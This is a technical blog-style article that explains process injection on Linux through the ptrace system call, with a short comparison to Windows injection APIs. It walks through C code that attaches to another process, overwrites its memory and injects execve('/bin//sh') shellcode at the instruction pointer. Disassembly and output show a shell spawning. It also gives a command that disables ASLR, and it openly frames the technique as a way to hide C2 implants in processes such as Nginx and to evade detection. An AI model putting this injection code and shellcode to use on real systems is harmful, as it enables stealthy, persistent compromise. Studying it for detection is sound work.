Introduction
Cybercriminals, or pentesters, will always attempt to obscure their presence on compromised systems in some way to make identification by detection and response mechanisms, users, and administrators as difficult as possible. Some of these techniques involve disguising themselves as a legitimate system process or manipulating a legitimate process in such a way that it becomes part of the malicious process persisted by the agent.
The techniques mentioned in this brief article have many legitimate uses, such as patching running services; for example, if a critical service needs correction that cannot be terminated for some reason, an alternative is to make the correction in execution. Another situation is the debugging of failing processes, so with dynamic analysis, it may be easier to find the problem, such as poor memory management or incorrect use of pointers.
However, from the moment it is possible to have such a level of interaction with a process, the malicious agent can abuse it in various ways to alter the execution flow, manipulating it to execute something that was not in the original instruction sequence, or it is possible to access data in memory, such as credentials and keys.
This type of tactic is also commonly employed in actions known as in-memory injection; one process infects another by injecting instructions, creating a new malicious thread in this other service. Also known as a fileless attack, it focuses on manipulating values in memory, normally there is no need to employ other evasion techniques against anti-malware solutions, as there will hardly be an EDR (Endpoint Detection and Response) solution performing dynamic memory analysis of processes. The malicious code itself is not written to disk, which prevents static analysis.
When deploying malware within the compromised server, such as an implant generated by C2 (Metasploit, Cobat Strike, Sliver, etc.), this malware must be initiated within the machine by a common executable file, or via another file acting as the first stage, which will abuse some functionality of other services/software to execute the malware (VBA, jscript, HTA, or C for shellcode execution), or then deployment in a template file that has the instructions somewhere in the binary (calc.exe
as in any example). These models have some problems:
- When the user closes the parent application, the implant will be terminated.
- It may be easier for security software/blue teams to detect processes with suspicious behavior, such as an MS Word (or in our case Libre Office because it's Linux) making requests to domain X within a period, executing several different system calls and creating threads without any sense.
To solve these problems, it may be interesting to migrate the implant to another process, such a process that is hardly terminated, or that has a behavior more aligned with the mode of operation and communication of the implant, thus creating good persistence on the server and creating a good disguise for the attacker's backdoor.
Imagine injecting an implant (Beacon) that the callback form to the C2 (command and control server) is made via the HTTP protocol, this implant could be injected into an NGinx service as a worker, if NGinx is acting as a reverse proxy the normal behavior is making requests outwards, so it would be a good way to obfuscate communication.
How it is done in a Windows environment
Using Linux-based operating systems, there are no ways to proceed with process injection as in Windows. Windows has many APIs for debugging purposes that, when abused, make the injection process very easy and safe, without corrupting the target process.
The main functions, often abused by malware within the Windows environment are described below; OpenProcess
used in the action of opening/attaching to an existing remote process for interaction. VirtuallAllocEx
is the expanded VirtualAlloc
API, this call can allocate a number n of bytes in the attached process. WriteProcessMemory
allows copying data to the remote process, the data (e.g., shellcode) are written in the previously allocated space. And finally, CreateRemoteThread
which will create a new thread in the remote process, this should execute the new code. Anyone wanting to hide under a legitimate process will abuse these APIs to achieve complete disguise. There are many other Windows API functions (including undocumented ones) for each action that can be used when trying to obfuscate the calls, as these mentioned functions are easily flagged by antivirus solutions.
The order of execution of the functions is well determined, any malware that uses the technique will have this same chain of functions regardless of the programming language employed. This makes detection trivial.
Note that, for every need, there is a function to do the job, such as memory allocation and creation of a new thread, in Linux (or UNIX-like systems) there is only one exported kernel API function called ptrace
which is used to meet all the needs in debugging a process.
Other ways to inject instructions into Linux
The LD_PRELOAD
environment variable allows the loading of dynamic libraries at process startup
, the functions exported by the library have priority over the original dependencies, this allows overwriting a function with code that alters the original behavior of the program.
The technique has several limitations:
- It will work only to overwrite common libraries.
- It does not work for a statically linked binary or not using the standard library.
- It does not work for binaries with SUID.
- The library configuration can only occur at the start of the process.
Another common way would be with the use of some software for debugging, like GNU Debugger. It must be coupled to the target process, which allows executing C format codes in this process. It is possible to use inline assembly to execute the instructions in the process, such as in the following example, which will execute /bin/bash
in the target process, enabling something similar to a process hollowing.
register char *x asm("%rdi") = "/bin/bash"; asm( "xor %rsi,%rsi;" // Clear content of reg rsi "xor %rdx,%rdx;" // Clear content of reg rdx "mov $59,%rax;" // Move 59 (execve) to rax "syscall;"); // Pass execution to the kernel
The problem is that it would be necessary to have GDB operating on the compromised machine. Installing it may become an opsec problem.
So, let's use ptrace
.
Syscall ptrace
The system call ptrace
gives a process, which uses it, the ability to observe and control the execution of another process. This process that starts monitoring is called tracer, the process being monitored is called tracee.
long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);
NR | Syscall | RAX | RDI | RSI | RDX | R10 |
---|---|---|---|---|---|---|
101 | ptrace | 0x65 | Long Request | Long Pid | Unsigned Long addr | Unsigned Long Data |
The tracer has a broad capacity for manipulation over the tracee process, enabling the reading and editing of registers, changing data at memory addresses allocated by the tracee and, consequently, manipulating the execution flow of the tracee process. ptrace
is implemented in the kernel so it has full access to the task_struct
process structure.
The ptrace
function must receive an action as the first argument, this action will dictate the type of interaction with the tracee process. The first action is which will couple the tracer to the tracee, PTRACE_ATTACH serves to couple to a thread of the process, if the process is multi-threaded it is necessary to couple individually.
Implementations
Many common Linux programs and utilities use ptrace
to help system administrators have more control over process execution and direct troubleshooting, for example, the strace
which serves to monitor system calls.
We can look at strace
working, applying tracing to a process we can manipulate, in this case, python. For this, I just started a REPL (Read Eval Print Loop) and executed the strace
command for the process id created by python, filtering by the openat
call. Without the filtering, the output would be extremely messy, almost impossible to find what we want.
╰─$ python3 Python 3.8.10 (default, Mar 13 2023, 10:26:41) [GCC 9.4.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import os >>> open("./history.txt","rb") <_io.BufferedReader name='./history.txt'>
Right after opening the file, a new line was shown captured by ptrace
, with the system call and the arguments used.
╰─$ strace -e openat -p 3330 strace: Process 3330 attached openat(AT_FDCWD, "./history.txt", O_RDONLY|O_CLOEXEC) = 3
It is possible to see that the function returned the file descriptor 3, which was created and now holds the content of the opened file.
Changing a string in memory
This example aims to change a string in another process (the tracee), for this to be possible it is necessary to have the memory address of that string, where it is allocated in the remote process, in addition to the process id.
The complete code of both programs can be found on github.
The following code, which will be used as the
target process, starts by allocating 5 bytes in the heap, a string of the same size will be copied to this memory space, and then the information will be shown on the terminal, the allocated string and the memory address offset of the string. This address will be important, as the modification of the bytes will be done from it.
Perhaps, disabling ASLR would make the process simpler, turning off address randomization. echo 0 > /proc/sys/kernel/randomize_va_space
The code needs to pause in some way to run the other program, which will do the injection, and then proceed to show the result, whether the string was changed or not. To pause the program there is a scanf
waiting for a digit, this can be used later.
Content of the proc.c
file.
char *m = (char *)malloc(5 * sizeof(char)); strcpy(m, "hello"); int n; printf("%s - %p\\n", m, m); scanf("%d", &n); printf("%s - %p\\n", m, m);
Running this code, the following data is directed to the output. The process is now waiting for input.
~$ ./proc hello - 0x55c1e3bfd2a0
Now we need the process ID.
30698 pts/1 S+ 0:00 ./proc
The other code is which will do the injection into the process. It declares a pid_t
type variable to receive the process ID and an array of chars to receive the address where the string is allocated in the target process. Finally, it declares the message that will be written in the remote process, and the length of this message.
pid_t pid = 30698; char *p = "0x55c1e3bfd2a0"; char *m = "mundo\\0"; int mlen = (int)strlen(m)
Some messages to debug the actions, this typecasting would not be necessary.
printf("Remote data pointer: %p\\n", (void *)address); printf("Local data pointer: %p\\n", (void *)m);
The variable p
has a memory address in the format of an array of chars, for this to be used to locate the string that will be modified, it is necessary to convert it to a pointer, so strtoull()
returns an unsigned long long value represented in the string. This can now be used when passing the destination address to ptrace()
.
unsigned long long address = strtoull(p, NULL, 16);
After the declarations and conversions that will be used in the course of execution, it is possible to attach to the process using the ID.
ptrace(PTRACE_ATTACH, pid, NULL,NULL)
It is necessary to implement some method to wait for the process to respond, this is implemented in the final code.
The following loop should take byte by byte of the message allocated in local memory, and copy it to the remote process increasing that memory address collected. Both memory addresses are incremented equivalently.
This copying process in this case is done with the PTRACE_POKEDATA action. The third argument receives the memory address that will be altered in the target process, and the fourth argument is about the data.
The data is passed as void pointer type so that the information is accessed as a byte, without, type assignment, it could be a char as well, keeping the original type.
for (int i = 0; i < mlen; i++, address++,m++) { printf("Write %p <- %p: %c\\n",(void *)address, m, *(int *)m); ptrace(PTRACE_POKEDATA, pid, (void *)address, *m) }
After the process is complete, it is already possible to detach from the target process.
ptrace(PTRACE_DETACH, pid, NULL, NULL) != 0)
The following block presents a detailing of the data being transferred.
Remote data pointer: 0x55c1e3bfd2a0 Local data pointer: 0x555555556017 Write 0x55c1e3bfd2a0 <- 0x555555556017: m Write 0x55c1e3bfd2a1 <- 0x555555556018: u Write 0x55c1e3bfd2a2 <- 0x555555556019: n Write 0x55c1e3bfd2a3 <- 0x55555555601a: d Write 0x55c1e3bfd2a4 <- 0x555555 55601b: o
Continuing the target process, it is possible to see that the string was completely replaced by the word “mundo”.
1 mundo - 0x55c1e3bfd2a0
Executing code within a remote process
This next example outlines a way to change the execution flow of the target process, and then execute arbitrary instructions, such as from shellcode.
The first step to executing a certain sequence of instructions is to have these instructions available in the process's memory. In Linux, there is no function like VirtuallAllocEx
, the closest way is using ptrace
as in the previous example, copying data from address to address.
Another issue is that, also, there is no function like CreateRemoteThread
to create a new execution flow in the remote process. It is possible to substitute this function with ptrace
, since there is an action to access the data of the registers, there is the memory address stored in the instruction pointer that references the instruction (in machine code) that will be executed. With the PTRACE_POKETEXT action, it should, therefore, inject the instructions in sequence in the next addresses that the instruction pointer will pass through. These injected instructions can execute a fork
to create a new subprocess, or use some other tactic to create a new thread. After the data insertion, the process is continued, the instruction pointer goes through the written bytes, and the data is passed to the CPU.
The first step is to attach to the process.
ptrace(PTRACE_ATTACH, pid, NULL, NULL);
It is necessary to record the current state of the registers, the shellcode will change the value of each register, usually, the original value is not replaced, so to not corrupt the process the registers must be restored after the injection.
struct user_regs_struct regs; ptrace(PTRACE_GETREGS, pid, NULL, ®s);
The source and destination addresses are pointers of the unsigned 4-byte integer type, so 4 instructions are passed at once.
An iteration is made writing the bytes of the instructions, in the sequence of the instruction pointer address.
The indexer i
must be incremented 4 times for each iteration since it represents the bytes of the shellcode being copied, for each iteration 4 bytes are written, then there must be this jump to the next block. This prevents that, when the shellcode ends it does not continue copying data beyond the limit.
In the repository code some prints were added to show the process.
uint32_t *s = (uint32_t *) shellcode; uint32_t *d = (uint32_t *) regs.rip; for (int i=0; i < shellcodeLen; i+=4, s++,d++) { ptrace(PTRACE_POKETEXT, target, d, *s); }
Finally, the registers are restored.
regs.rip += 2; ptrace(PTRACE_SETREGS, target, NULL, ®s);
And the process detached from the tracee.
ptrace(PTRACE_DETACH, target, NULL, NULL);
To test this code I executed proc.c
from the previous example. I found out the process ID is 19156.
./a.out hello - 0x564a603702a0
As shellcode, I use a sequence of instructions to execute the command /bin/sh
, of just 24 bytes.
0000000000000080 <_start>: 000080: 50 push %rax 000081: 48 31 d2 xor %rdx,%rdx 000084: 48 31 f6 xor %rsi,%rsi 000087: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 00008e: 2f 73 68 000091: 53 push %rbx 000092: 54 push %rsp 000093: 5f pop %rdi 000094: b0 3b mov $0x3b,%al 000096: 0f 05 syscall push rax ; Insert rax into the stack xor rdx, rdx ; Zeroes the content of rdx xor rsi, rsi ; Zeroes the content of rsi mov rbx,'/bin//sh' ; Moves the byte sequence to rbx push rbx ; Inserts rbx into the stack push rsp ; Inserts rsp into the stack (sp = stack pointer), pointing to rbx. pop rdi ; Loads the top of the stack (rsp) into rdi, which will be "/bin/sh". mov al, 59 ; moves syscall execve into al. syscall ; passes execution to the OS which should use the syscall in al.
The execve
system call (59) receives as an argument rdi
which should be the filename that the kernel will create the process on, rsi
a pointer to an argument vector, and rdx
which should be a pointer to an environment variable vector.
After executing the tracer, the output was pasted in the following block. There were 6 copy actions, in which 4 bytes were injected into the tracee
process.
Start injecting shellcode at 0x7f6ea3edcfd2 Writting from 0x55ddcee77056 - d2314850 to 0x7f6ea3edcfd2 Writting from 0x55ddcee7705a - 48f63148 to 0x7f6ea3edcfd6 Writting from 0x55ddcee7705e - 69622fbb to 0x7f6ea3edcfda Writting from 0x55ddcee77062 - 732f2f6e to 0x7f6ea3edcfde Writting from 0x55ddcee77066 - 5f545368 to 0x7f6ea3edcfe2 Writting from 0x55ddcee7706a - 50f3bb0 to 0x7f6ea3edcfe6 24 Bytes written Continue from 0x7f6ea3edcfd4 Deataching from PID: 19156
The process was continued and a shell is started in the target.
╰─$ ./a.out hello - 0x564a603702a0 $ ls README.md a.out main.c main1.c proc.c $ cat /etc/os-release NAME="Ubuntu" VERSION="20.04.6 LTS (Focal Fossa)" ID=ubuntu ID_LIKE=debian ...
When the registers are restored, the instruction pointer returns to the top where now it is the offset of the shellcode. The execution is continued, the instruction pointer sweeps through the shellcode and executes it.
Conclusions
In UNIX-based systems, there is not all the support for different process manipulation needs as in a Windows environment, but it is still possible to rely on the ptrace
function to meet the needs. The instruction injection techniques need to be much more elaborated and, working in one architecture, may not work in another, making it somewhat unstable, which is why we do not see major post-exploitation tools supporting process migration, for example, in many cases it may not work, and worse, it may corrupt the target process, becoming a more critical problem.
This article serves as an introduction to the technique. As mentioned, I believe that process injection in Linux is underdeveloped, so I would like to build something more solid to eventually add to the post-exploitation tools the ability to migrate and spawn in a remote process, as is well developed by C2 tools when operating in Windows. Possibly, the next article will be about injecting object files or shared libraries, but for that to be possible, the foundation has to be very well understood.
References
- Like all research I do, I forgot to save. But I will populate this area.